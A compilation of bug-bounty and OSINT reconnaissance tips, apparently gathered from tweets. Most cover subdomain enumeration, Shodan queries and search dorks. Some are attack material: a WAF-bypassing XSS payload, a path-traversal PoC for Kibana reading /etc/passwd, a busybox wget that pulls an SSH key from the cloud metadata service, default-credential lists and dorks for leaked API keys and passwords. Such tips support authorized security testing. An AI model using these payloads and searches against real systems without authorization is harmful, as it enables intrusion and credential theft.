OSINT / Recon

• OSINT #BugBountyTip: Found an #ElasticSearch instance while doing #recon? Hit these endpoints - https://elastic.host/_cat/api (More in the thread, add your own as well)

• BugBounty tip: look for port 9200 (Elasticsearch), then use this extension to easily find the juicy stuff: https://chrome.google.com/webstore/detail/elasticsearch-head/ffmkiejjmecolpfloofpjologoblkegm?hl=en-US … Remember: http://Shodan.io is your friend and you can sort by organization using org:"Org Name" query.

• "Encountered with AWS WAF? Just add ""<!"" (without quotes) before your payload and bypass that WAF. :) eg: <!alert(1)"

• One of the very useful ways to improve your hacking/bughunting skills when you're learning something new is by searching for it along with the @hackerone word on google Examples: - hackerone lambda - hackerone graphql - hackerone SOAP - hackerone cloudwatch

• While testing Cloud Enviornment, look for cloud_metadata.txt. It conatins a list of URLs to their internal metadata services & what you can get from each URL.

• A useful one-liner to quickly get subdomains of a DOMAIN: curl -s https://dns.bufferover.run/dns?q=.DOMAIN.com … |jq -r .FDNS_A[]|cut -d',' -f2|sort -u

• Kibana will return a content length of 217 if it is publicly open and one can access the dashboard without authentication.

• In a cloud test if you find a .cspkg file its a gold mine, its a zip file with all the compiled code and config files.

• Oneliner Subdomain Enumeration! Run this nifty little command to grab a neat list of subdomains under a given TLD: curl 'https:​//crt​.sh/?q=%.example​.com&output=json' | jq '.name_value' | sed 's/\"//g' | sed 's/\*\.//g' | sort -u

• Search for public Trello boards of companies, to find login credentials, API keys, etc. or if you aren't lucky enough, then you may find companies' Team Boards sometimes with tasks to fix security vulnerabilities

• Want to find employees of a company on github? Use this: https://github.com/search?q= {COMPANY_NAME}-&type=Users. This will help to find any users who have "company_name-" in their name. Most of the time these accounts are employee accounts or is company owned.

• github #bugbountytips If you are looking up for secrets at GitHub code then don't forget to also look over file commit history. ;)

• If you want to know the name of inside-site s3 bucket - just put %c0 into url

  
• Found an S3 Bucket behind a CDN and can't get the name? change to HTTPS and if it shows the same response the bucket name should be the same domain name

• #BugBountyTip inside a #container / #pod that has no wget/curl? try busybox... busybox wget -q -O - http://169.254.169.254/latest/meta-data/public-keys/0/openssh-key

• #bugbountytips #infosec Lookout for public google groups : POC [ https://groups.google.com/a/companyname.com … ] https://tutorgeeks.blogspot.com/2019/05/google-groups-misconfiguration.html …

• [#OSINT] Find domains by registrant name or email (link: https://viewdns.info/reversewhois/) viewdns.info/reversewhois/

• Just found two amazing websites. 1) (link: https://inteltechniques.com/menu.html) inteltechniques.com/menu.html 2) (link: https://intelx.io) intelx.io These two will boost your recon. (link: https://intelx.io/) intelx.io keep records of all pastebin pastes which are indexed on google and those which are removed.

• Elasticsearch Kibana Console插件LFI CVE-2018-17246

  PoC： GET /api/console/api_server?sense_version=%40%40SENSE_VERSION&apis=../../../../../../../../../../../etc/passwd

• #OSINT Tip: Looking for Passwords, API, Secrets, etc.? Always check in Online IDEs too. Gives a lot of working #APIKeys and #Passwords. Example: site:http://ideone.com “apikey” site:http://ideone.com “aws_access_key_id”

• Search the copyright string on Google to find other websites owned by the target

  e.g.

  intext:"© Example Inc."

• Really shocking to see how companies leave their log instances exposed to public. I'm referring to #Kibana, since last few weeks have found a lot of them, reported to companies who have BBP's. Dork - inurl:app/kibana Shodan - title:"kibana" port:"443"

• #Bugbountytip: forget the subdomains for recon! go directly for the ASN & hit the network-range organization: A new world arises without waf’s, a lot of messy SSL certs, unprotected hosts & private hidden scopes! #bugbounty #infosec #thinkOutsideTheBox

• A tips from Nahamsec@NahamSec curl -X GET http://asnlookup.com/api/lookup?org={organization} https://ultratools.com/tools/asnInfoResult?domainName=…{organization} https://ipinfo.io{IP address} Shodan search query ASN:{ASN} #bugbountytip #bugbountytips

• #bugbountytip look out for port 2181 - zookeeper , check if you are able to commands , as there is no auth in place by default in zookeeper installations.

• Shodan query tip: If "ssl:<domain>" doesn't return anything try "http://ssl.cert.subject.CN:<domain>"

• #bugbountytips port 9090 tcp it could be zeus-admin panel or could be any other like prometheus . if its prometheus then you can easily get the running nodes info, all the hostnames , etc

• If you see a "kafka_cluser_id" in the json http body, check /connectors and then /connectors/{name} for juicy stuff (it usually runs on port 8083)

• Default credentials that i always try: admin:admin test:test admin:password admin:pass test@test.com:test test@company.com:test (try with all domains that belong to company) test@company.com:test@company,com

• Time for a new #bugbounty tip! When I sign up to a website/newsletter/reset password, I look at the website which hosts the logo/image in the email I receive. This led me multiple time to insecure AWS S3 buckets and scope expansion.

• Use this google dork to find bitbucket repos -> intitle:" about atlassian bitbucket" #bugbountytip

• #bugbountytips copy the copyright in your target site and search google for previous years to discover abandoned asset . E.g " © 2020 Uber Technologies Inc." now search google for "© 2017 Uber Technologies Inc." you will often find forgotten assets #bugbounty

• During my interview with@NahamSec I've shared a very handy #BugBountyTip for wide-scope #BugBounty programs: Look for Google Analytics Tracking IDs (UA-XXXXXX-X) and use i.e. https://dnslytics.com/reverse-analytics… to discover more assets sharing the same ID.

• Sharing one of my secrets #BugBountyTip When discovering subdomains/domains/assets owned by a company, use the Google Analytics ID to expand your attack surface. The ID is in the HTML code. Reverse search then: http://site-overview.com/website-report-search/analytics-account-id/ID… RT once this helps!#bugbountytips #infosec

• Find subdomains not using HTTPS site:http://example.com -inurl:https://

https://twitter.com/adrien_jeanneau/status/1250740511402532865

• Here's my favourite way to reliably bruteforce subdomains: cat SecLists/Discovery/DNS/dns-Jhaddix.txt | subgen -d DOMAIN.TLD | zdns A --name-servers 1.1.1.1 --threads 500 | jq -r "select(.data.answers[0].name) | .name" #bugbountytips

• Quickly get the ASN of an IP address, along with the associated company name and location: curl http://ipinfo.io<ip>

• Some companies rely on cloud services specially in that period for remote work, so whenyou look for credentials on github and similar services remember that examples: "centrify. com" password "service-now. com" password You can try send_keys keyword also. #BugBountyTips

• Use shodan to find HTTP servers of a company that are running on "non-standard" ports.

  HTTP ASN: -port:80,443,8080

  Make sure you are logged in.